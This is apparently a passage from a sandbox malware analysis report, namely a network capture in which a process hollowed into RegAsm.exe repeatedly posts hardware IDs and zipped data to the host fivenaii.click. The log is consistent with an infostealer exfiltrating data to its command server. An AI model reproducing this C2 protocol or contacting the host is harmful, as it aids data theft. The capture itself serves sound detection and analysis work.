                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              X-Frame-Options: DENY
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wSHSwwUKPceMTDvapwPU5HKACaVO73D2O3a28d6a%2BetcJNeUHCYkut7nmxHYR0Vbs%2FJHdEBCW%2BEGilv%2FEGI6WtBba%2BsneYy2gAldr7Xruy%2Bikpo%2Fi4%2FRd99SnyN3qmPXrA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f8c6dfabe1b32d3-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1948&min_rtt=1945&rtt_var=736&sent=16&recv=24&lost=0&retrans=0&sent_bytes=2834&recv_bytes=19114&delivery_rate=1479229&cwnd=146&unsent_bytes=0&cid=ee72e2abe7474ddd&ts=1014&x=0"
                                                                                              2024-12-27 21:33:34 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                              Data Ascii: fok 8.46.123.189
                                                                                              2024-12-27 21:33:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              22192.168.2.449770104.21.60.244432196C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-27 21:33:35 UTC279OUTPOST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=FRHHII88EX2SEMY7YY
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 8789
                                                                                              Host: fivenaii.click
                                                                                              2024-12-27 21:33:35 UTC8789OUTData Raw: 2d 2d 46 52 48 48 49 49 38 38 45 58 32 53 45 4d 59 37 59 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 39 42 32 39 35 46 33 31 41 38 34 44 31 39 38 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 46 52 48 48 49 49 38 38 45 58 32 53 45 4d 59 37 59 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 46 52 48 48 49 49 38 38 45 58 32 53 45 4d 59 37 59 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 56 43 36 44 66 6d 2d 2d 54 65 73 74 4f
                                                                                              Data Ascii: --FRHHII88EX2SEMY7YYContent-Disposition: form-data; name="hwid"B9B295F31A84D198BEBA0C6A975F1733--FRHHII88EX2SEMY7YYContent-Disposition: form-data; name="pid"2--FRHHII88EX2SEMY7YYContent-Disposition: form-data; name="lid"VC6Dfm--TestO
                                                                                              2024-12-27 21:33:36 UTC1131INHTTP/1.1 200 OK
                                                                                              Date: Fri, 27 Dec 2024 21:33:35 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=t9bi34k8dhgps05p5qqslam35a; expires=Tue, 22 Apr 2025 15:20:14 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              X-Frame-Options: DENY
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G2BhND65gN4n2WN1YFqo5evpV4Wd7nMOWinivLqiK%2BmAxrebkCxb%2BgT%2BfGneka0Go3hhPHLfmz8Fi1YE7jO%2BT6ATosbHJwHGnhq33HxjoFozKPxA%2BQWX2zRlbc0fTeSPKg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f8c6e08a9498c3f-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2086&min_rtt=2086&rtt_var=782&sent=8&recv=14&lost=0&retrans=0&sent_bytes=2833&recv_bytes=9726&delivery_rate=1399137&cwnd=229&unsent_bytes=0&cid=b3397040c95f4981&ts=822&x=0"
                                                                                              2024-12-27 21:33:36 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                              Data Ascii: fok 8.46.123.189
                                                                                              2024-12-27 21:33:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              23192.168.2.449771104.21.60.244437548C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-27 21:33:35 UTC277OUTPOST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=9KREDXIF8S0UJ1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 571116
                                                                                              Host: fivenaii.click
                                                                                              2024-12-27 21:33:35 UTC15331OUTData Raw: 2d 2d 39 4b 52 45 44 58 49 46 38 53 30 55 4a 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 39 42 32 39 35 46 33 31 41 38 34 44 31 39 38 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 39 4b 52 45 44 58 49 46 38 53 30 55 4a 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 39 4b 52 45 44 58 49 46 38 53 30 55 4a 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 56 43 36 44 66 6d 2d 2d 54 65 73 74 4f 74 63 74 75 6b 0d 0a 2d 2d 39 4b 52
                                                                                              Data Ascii: --9KREDXIF8S0UJ1Content-Disposition: form-data; name="hwid"B9B295F31A84D198BEBA0C6A975F1733--9KREDXIF8S0UJ1Content-Disposition: form-data; name="pid"1--9KREDXIF8S0UJ1Content-Disposition: form-data; name="lid"VC6Dfm--TestOtctuk--9KR
                                                                                              2024-12-27 21:33:35 UTC15331OUTData Raw: 65 26 61 e0 49 9c 12 90 f2 e6 bf ff d4 22 e4 03 f8 5d 15 2b 4c 25 56 4a 33 96 00 92 9e 84 05 53 1e 87 bd 02 6c 33 05 f0 bb f0 5a df 61 1c 92 d1 db 0a af 31 86 ce 4b d2 f0 bb c9 2e 22 e0 8c 3a 16 c6 71 b1 6b d6 e8 50 c5 ed ab fb b9 6e db 41 6a 90 e3 ff 5b a5 a4 f9 00 dd 7e 57 70 07 0d ea c9 e4 9e 20 e0 b5 85 83 05 68 0a ce 69 61 e1 25 66 ec 9e b4 52 01 88 f7 e7 82 51 ea 31 06 6f c1 d0 b6 cd 12 62 1c 92 ea 15 06 97 12 d3 1c dc 70 a0 41 9e 17 60 8c 8e d9 9e e1 50 02 c9 a9 c0 d4 ed fc 22 4d 9a df e6 e7 e4 b0 87 5f 8c 98 a2 9d 52 5e 8e 5c 28 7a c4 38 fe d5 e2 94 0a 6f 5a 2b 8e 5a 61 2a ab 31 04 cb f4 14 21 36 80 f7 a3 a8 18 53 70 01 c3 a2 a4 6c 35 f8 bb c8 73 6a 1d 89 5c d2 8a 7c 15 ff 98 f1 f8 aa 9d 04 95 cc 48 c7 c2 12 cb 9a 33 ef 96 80 df 1e 9a 36 3a 50 10
                                                                                              Data Ascii: e&aI"]+L%VJ3Sl3Za1K.":qkPnAj[~Wp hia%fRQ1obpA`P"M_R^\(z8oZ+Za*1!6Spl5sj\|H36:P
                                                                                              2024-12-27 21:33:35 UTC15331OUTData Raw: 5c 15 f4 4f 0b 15 09 2f 16 46 34 ab e9 44 14 55 22 24 6f 59 19 49 63 1f 47 da 98 39 bd 9a ce 68 ff b5 06 cd 21 2c 6f 14 94 c2 be a8 b7 ca 6d 12 70 e4 a6 c2 58 fe 44 44 0b 45 22 d8 4b 82 76 ea 01 ae e3 05 82 8a 94 19 06 7b a5 22 4b 4c d7 32 1f 0d 9b 8a d1 2a e3 d3 cf 2a d7 25 43 04 88 7b ba df e5 37 d1 4d a6 60 a1 18 2d d5 87 78 b9 c2 17 1a b3 1f 0a 45 c6 76 4f 1a 02 1f 24 fa 4d 9d 52 04 62 82 4a ae 29 c5 e8 a0 7b 06 c3 85 66 bf 18 4d 0f 76 ac d3 4b 2c f6 77 9e 67 4a a2 c3 05 79 fb ea e9 7f a9 ba 7e 8f a3 30 0c ca 38 73 73 46 7e ab 6f 8e 59 72 06 a4 11 7e e7 2b 72 73 dd 0c 22 5c 6b 47 a8 d6 f7 07 c8 7b ba ae 47 50 ae 9c e1 ba bc c1 43 a3 af e6 a7 be 8b 5d ae fc 2b e8 67 8b c6 66 bc b7 0b e4 a3 09 67 9e 20 63 ee 60 ee 3e 58 bc 14 93 95 a7 76 27 9e 4d 6a 3d
                                                                                              Data Ascii: \O/F4DU"$oYIcG9h!,ompXDDE"Kv{"KL2**%C{7M`-xEvO$MRbJ){fMvK,wgJy~08ssF~oYr~+rs"\kG{GPC]+gfg c`>Xv'Mj=
                                                                                              2024-12-27 21:33:35 UTC15331OUTData Raw: c5 1e c3 50 4b af ee 2d 9a a8 3a 34 52 dc a0 7d 72 10 21 ee ee 1d a0 fa 42 97 d3 ef 2d 43 8a be fa ed 49 89 ed d2 57 7b ea c5 a5 67 57 c3 80 6d 0c 6a 8e 6d d6 9a 57 02 30 d4 df 77 3f 1e 79 c5 74 e9 0b ce 40 1d 68 99 6f de f7 68 9d 70 35 5c 29 35 c5 db 3a 18 e5 bf bb 36 f5 17 41 37 45 50 fc 45 ec 80 2f 38 63 f3 5f d1 e4 e8 f5 8e 3a a3 9c a5 89 66 ab ed a5 a2 8f 4e bc e4 68 f9 dd 25 35 9f b8 66 3b e7 c3 af 17 de fb ef 65 c8 0e 0b de a1 b8 7d 40 f7 22 3f 3f e4 48 3f 20 fc 57 4b 49 dd dc e4 5c a4 ba 86 2e d9 7d bc d1 1b b5 24 72 13 ed 71 cf 35 49 28 a9 41 4f d0 cc 05 8c b5 a9 31 95 ba bd 05 c1 b5 25 d8 79 94 ba 79 5c 86 4e 18 dc f2 bb 73 f2 73 37 8e d9 d3 7e b4 24 6d e1 11 65 6f 77 fb c7 b9 d4 ca 1f 1c 83 38 0b 8a ec d5 e6 bb 3c c5 8b e7 68 7e 65 ad fd e4 4f
                                                                                              Data Ascii: PK-:4R}r!B-CIW{gWmjmW0w?yt@hohp5\)5:6A7EPE/8c_:fNh%5f;e}@"??H? WKI\.}$rq5I(AO1%yy\Nss7~$meow8<h~eO
                                                                                              2024-12-27 21:33:35 UTC15331OUTData Raw: 5d 01 a1 65 8d 5b ca 0c e9 87 c4 e9 c5 4c de 84 4d f5 fd b9 38 b8 79 50 47 b8 cb 57 eb 34 c7 47 ca 68 bc cd c1 ab 9c 9c b3 e0 35 34 f2 42 75 a9 36 b9 aa 2c 09 1d 7b 40 75 c4 82 63 13 bc df d9 45 5e 6c f7 ce 9e 56 a6 db 43 6e b3 66 65 de 93 bf c7 4a 32 e0 55 81 9b d5 19 ae b9 10 6f 19 d1 8b 30 98 e3 82 3f cc 18 dc dc 8b 10 02 46 13 b9 50 1d 11 e8 bd 3e c3 47 1c 1c 57 b3 d9 81 3c 0f a5 37 44 fd af 4c da 22 83 02 6e 7b 4d 3a 15 dd 47 82 0f f7 32 9b 78 c0 10 c5 71 d4 5a d5 05 23 bc f3 ee fd a7 c3 ef b5 4d fd b5 24 1d ee 1f 91 b4 b9 a7 f2 5e d9 9c 94 ee 87 fe fb 80 d6 b4 70 32 61 05 62 f8 27 52 f9 fe ff af e4 86 24 28 1d e3 81 f3 c0 e2 9f 81 4b 32 8b 6f 84 18 55 e5 94 94 16 64 31 fc 79 b1 e4 51 11 0f 07 e1 3c d5 fe 89 b3 23 9c f0 5d a2 2c 2b 41 10 f1 67 7b 3a
                                                                                              Data Ascii: ]e[LM8yPGW4Gh54Bu6,{@ucE^lVCnfeJ2Uo0?FP>GW<7DL"n{M:G2xqZ#M$^p2ab'R$(K2oUd1yQ<#],+Ag{:
                                                                                              2024-12-27 21:33:35 UTC15331OUTData Raw: e9 99 1d 29 5b 0a d0 bd 3d bc a6 bd 64 7b 2b b1 42 b8 41 90 d2 e4 c6 f7 72 e2 6c e7 e4 d2 da 90 8d 5b c5 fc 3a b3 08 39 a7 3a 09 e1 a6 72 64 85 45 e3 e7 e5 1a 6c b5 7c a1 8b 3d a1 40 ee 59 54 21 a9 d1 c0 c0 57 e0 c7 c1 96 40 aa ba 72 ab b7 76 6d 02 14 ef bd ed f3 2c 4d 0b 19 58 b0 fd 6a 47 ad 88 b5 0c 23 00 b1 ab d6 19 a5 1c ae cf b1 ed e2 98 d2 2f 84 01 41 37 c6 ee f1 f5 dc 3f 72 77 6b d2 a9 5e b1 bb c8 d9 a3 2d 59 a8 44 25 da 50 cc 7e bc ef f2 47 23 9b 6f fa 9e 05 82 86 1a 4d 61 5b 7c 61 a7 db f8 8a f3 0d 67 1d 63 7b 2b b6 1f fc 08 32 fc 21 74 ce 59 f6 57 5d e2 33 e8 77 09 36 b7 32 11 43 00 0f 86 0a e8 ad 6d 83 f2 b6 dc 1f ae 90 70 36 a2 77 10 b7 7e 8b 5e 70 54 e7 f0 96 3e ee 10 c7 1f 35 b1 75 94 5e 64 66 40 32 ac 92 64 44 ef 53 53 9f d5 93 c7 84 c0 3e
                                                                                              Data Ascii: )[=d{+BArl[:9:rdEl|=@YT!W@rvm,MXjG#/A7?rwk^-YD%P~G#oMa[|agc{+2!tYW]3w62Cmp6w~^pT>5u^df@2dDSS>
                                                                                              2024-12-27 21:33:35 UTC15331OUTData Raw: c5 72 5f 94 b2 7f ac 99 e0 72 2e 90 21 62 31 1b 89 3c 84 91 e5 6d 96 b5 0b 99 5e ff 59 4e 91 13 25 ef ea 7a ce 2a f9 ff da 2a 7e e2 64 11 f0 f5 ce e1 bc b8 2a 8f 37 fb da 02 e3 74 fb be 21 f1 ee dc b7 aa ac 61 89 26 d8 85 53 25 c8 48 41 90 87 0e ac 2e cd 48 4a e3 04 21 37 50 e7 36 53 90 ba 9b 0d 9b 28 77 b8 55 f5 50 f4 c7 45 40 58 f5 0e 02 b7 70 32 b3 99 13 1c a8 92 ff 6d d9 2b 1b 1f bd 64 c0 b5 3b cb 43 b2 5e a6 fe f5 af 8f 1f 21 7f ec 8c cf 06 12 c4 7b 6f e0 16 71 c8 f2 5b 8e 69 ee 73 25 f1 d5 78 45 2b 5a 12 63 fd 67 26 3e f2 c9 66 68 0a 22 f9 36 0b b3 39 6e 4b 1a 4a 28 d0 46 c2 cd 07 ac 48 13 74 56 ee ac 96 7e 9b 8f 66 fd 8c 12 bd 89 06 b8 cd d5 9f 69 2c 9f 21 04 fd da e8 d2 e3 9c 7b 81 4c 76 80 73 f5 8f 6b 51 0e bd 60 b1 46 08 5c dd 18 2d f9 58 23 3d
                                                                                              Data Ascii: r_r.!b1<m^YN%z**~d*7t!a&S%HA.HJ!7P6S(wUPE@Xp2m+d;C^!{oq[is%xE+Zcg&>fh"69nKJ(FHtV~fi,!{LvskQ`F\-X#=
                                                                                              2024-12-27 21:33:35 UTC15331OUTData Raw: 14 c8 ee 4b 78 48 a9 87 95 f8 81 b5 11 b3 ee 0e 92 a0 fb 0e f5 27 91 10 22 87 98 77 a2 1e 08 98 83 d7 0d e7 af 85 c2 84 e7 21 fa fc 89 8b 43 15 0e a3 79 e9 04 11 4d 86 42 ba e2 6b 72 82 a7 29 6c 5a 0f 97 49 75 51 b9 ef a6 6d 2e 86 61 60 02 d9 99 ef 57 fb 7f db d3 5a f4 32 7f 24 6c 02 9e 03 73 cf 51 b0 ec fc 99 f1 17 58 98 0f c7 bb 28 8d ed 1c 9f 98 73 65 db 0f 44 1a 10 b5 51 66 62 7d 45 37 ec 6b 5d 94 d2 e7 c6 53 cc 2e 28 5e 52 ca 30 98 53 6f 73 8d b5 af 21 ca 87 ea 5d 12 8c 27 f3 03 5e 81 f5 d8 aa a3 ae f5 9d 66 4d e3 fb 43 1c a5 02 90 98 55 be a2 5e fa 03 4f 7f 12 f6 fa be 45 6f 28 19 d9 9d 1a d7 52 c3 7b 22 1a 68 36 9f 06 bf 95 af ea 97 78 72 5e 94 3d 38 3e 2c d1 ef b4 e9 fc 2f e2 09 a5 70 ff 54 fd 55 01 52 a0 47 0c 63 d8 28 bf a7 24 e0 9a d7 d2 e6 97
                                                                                              Data Ascii: KxH'"w!CyMBkr)lZIuQm.a`WZ2$lsQX(seDQfb}E7k]S.(^R0Sos!]'^fMCU^OEo(R{"h6xr^=8>,/pTURGc($
                                                                                              2024-12-27 21:33:35 UTC15331OUTData Raw: bf f3 c7 9f a1 4b 98 ee eb 27 7d 7b a2 0a 35 2f 12 f7 f7 00 fa 60 26 42 4b 82 98 f9 b2 a0 ea f2 7e 00 ff cb 0b a2 0d 26 dd 2b 73 d6 5e 26 b6 90 b5 b1 5c 07 d4 77 4d 1e 81 ed 66 0e 33 52 e0 ea 6e 53 79 88 14 0f 07 21 cb 84 33 2c dd 47 93 e1 d7 64 5e 8c 5d 90 c4 12 a7 f8 3a 7e 25 f8 2d 08 b7 12 10 91 6e 7e 1e f3 0f 54 b8 73 7b 2a d4 3b 1d 3a 96 20 cb 6c 5c a7 89 e0 77 c9 c2 ef 00 ca 6d 28 29 76 eb e0 f3 10 22 fe 06 e3 62 b2 ed 6c 77 d1 b0 1e 5b 46 58 c8 8d 7b f0 da 68 81 70 94 4a 27 e0 4e cc 85 1f 25 c0 5a 86 bf e6 98 9c 57 3a 6d 0d d1 12 a2 42 90 f2 46 a0 0e 55 98 20 42 27 ec bb 54 ff 00 e2 87 f8 f8 05 25 be d5 1c 78 14 2b ff f4 13 38 d0 fb b5 29 1f 65 d6 10 2c c1 79 03 d2 9f 04 ab 22 68 c1 ae 31 8d 2f 9e 0c aa 3b e4 b7 07 f0 cd 26 e5 91 f9 f9 66 b7 e8 51
                                                                                              Data Ascii: K'}{5/`&BK~&+s^&\wMf3RnSy!3,Gd^]:~%-n~Ts{*;: l\wm()v"blw[FX{hpJ'N%ZW:mBFU B'T%x+8)e,y"h1/;&fQ
                                                                                              2024-12-27 21:33:35 UTC15331OUTData Raw: 3e 42 2d 55 e9 b0 b6 b4 72 9d d6 78 39 f3 f7 93 73 a1 ed fb 02 38 47 cd 56 bc 10 1b 80 7d b4 45 ba ff 3f 40 99 7d ae f5 a8 d0 18 a4 9b 33 36 f4 f6 3f dd 3e 0e 1b df 05 75 0b b2 f9 e7 aa ef 1f be 25 41 d8 6e 14 c0 ed 85 c8 fc 50 c6 9e e8 a1 d8 7c 23 3b 14 0c 87 d9 ee de 66 e9 cf 59 b7 7e 06 d7 87 f0 72 a7 b0 ec 82 ec a3 fb a5 99 b7 1a d4 6c 4e 23 6b 1b e3 be bf f4 cd f1 52 00 7b f0 9c 80 c8 aa c5 18 a9 93 4e be dc 0f cd ae 0e b2 b4 a2 09 0b 7e b2 38 e7 f1 57 f3 db 00 3f 81 f8 6b 84 18 84 0b c6 6d fd 7a 76 69 34 49 84 e2 0b 99 3b e6 67 20 64 1e d6 8b ee 10 6c ca d2 3a 04 0e 5b a7 d7 d6 18 ad 06 a6 35 a1 4d 4b 31 fc f4 46 1e 8a b9 49 31 f7 3c cb 5a 4f fa 74 3d 8d 17 4c 6e a0 67 ec 40 d3 2f 61 8d 05 ca eb a4 5a d9 74 c5 fa 40 59 91 31 9d 37 ca 89 e1 de 52 cc
                                                                                              Data Ascii: >B-Urx9s8GV}E?@}36?>u%AnP|#;fY~rlN#kR{N~8W?kmzvi4I;g dl:[5MK1FI1<ZOt=Lng@/aZt@Y17R
                                                                                              2024-12-27 21:33:37 UTC1139INHTTP/1.1 200 OK
                                                                                              Date: Fri, 27 Dec 2024 21:33:37 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=v0rkunicbur5elr66gon5dnvuq; expires=Tue, 22 Apr 2025 15:20:16 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              X-Frame-Options: DENY
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9XkrHLas%2F2S7%2Fs36Q1wxxajrq6VSzDYvndfAJ0ZlRdqx1m5%2BMQH9zLfG82sCOIeHw%2FBMjzJP%2F4GStrhYAzhIcLHiuxnh3ifNpdKF8wsDUVQt8bkf2XfLm1i%2B5JMo6WiJoQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f8c6e094a220f83-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1644&min_rtt=1634&rtt_var=633&sent=312&recv=597&lost=0&retrans=0&sent_bytes=2833&recv_bytes=573657&delivery_rate=1701631&cwnd=230&unsent_bytes=0&cid=204502405117c160&ts=2442&x=0"


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              24192.168.2.449772104.21.60.244432196C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-27 21:33:37 UTC272OUTPOST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=K0RL857YU4
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 20394
                                                                                              Host: fivenaii.click
                                                                                              2024-12-27 21:33:37 UTC15331OUTData Raw: 2d 2d 4b 30 52 4c 38 35 37 59 55 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 39 42 32 39 35 46 33 31 41 38 34 44 31 39 38 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 4b 30 52 4c 38 35 37 59 55 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 4b 30 52 4c 38 35 37 59 55 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 56 43 36 44 66 6d 2d 2d 54 65 73 74 4f 74 63 74 75 6b 0d 0a 2d 2d 4b 30 52 4c 38 35 37 59 55 34 0d 0a 43 6f 6e
                                                                                              Data Ascii: --K0RL857YU4Content-Disposition: form-data; name="hwid"B9B295F31A84D198BEBA0C6A975F1733--K0RL857YU4Content-Disposition: form-data; name="pid"3--K0RL857YU4Content-Disposition: form-data; name="lid"VC6Dfm--TestOtctuk--K0RL857YU4Con
                                                                                              2024-12-27 21:33:37 UTC5063OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9b dc 40 f0 eb
                                                                                              Data Ascii: lrQMn 64F6(X&7~`aO@
                                                                                              2024-12-27 21:33:38 UTC1125INHTTP/1.1 200 OK
                                                                                              Date: Fri, 27 Dec 2024 21:33:38 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=pi3vvi3am1aps57klbe35f96jo; expires=Tue, 22 Apr 2025 15:20:16 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              X-Frame-Options: DENY
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Eqxg9GRpvAjvhEnNydaca1MAf21Gw29WRQP719RuXkQ3q0NFZjfIjBTEmwNWTnrHtzK50mI7Qi6hQ%2BjxWYg6Ylv5uKeoKKIpElfP5wcDBS6KPf0RtnbyOGTpGPaEXRbo8Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f8c6e159bb14325-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1769&min_rtt=1764&rtt_var=672&sent=15&recv=27&lost=0&retrans=0&sent_bytes=2833&recv_bytes=21346&delivery_rate=1615938&cwnd=180&unsent_bytes=0&cid=d97a3fc96d1b392a&ts=804&x=0"
                                                                                              2024-12-27 21:33:38 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                              Data Ascii: fok 8.46.123.189
                                                                                              2024-12-27 21:33:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              25192.168.2.449773104.21.60.244437548C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-27 21:33:39 UTC262OUTPOST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 87
                                                                                              Host: fivenaii.click
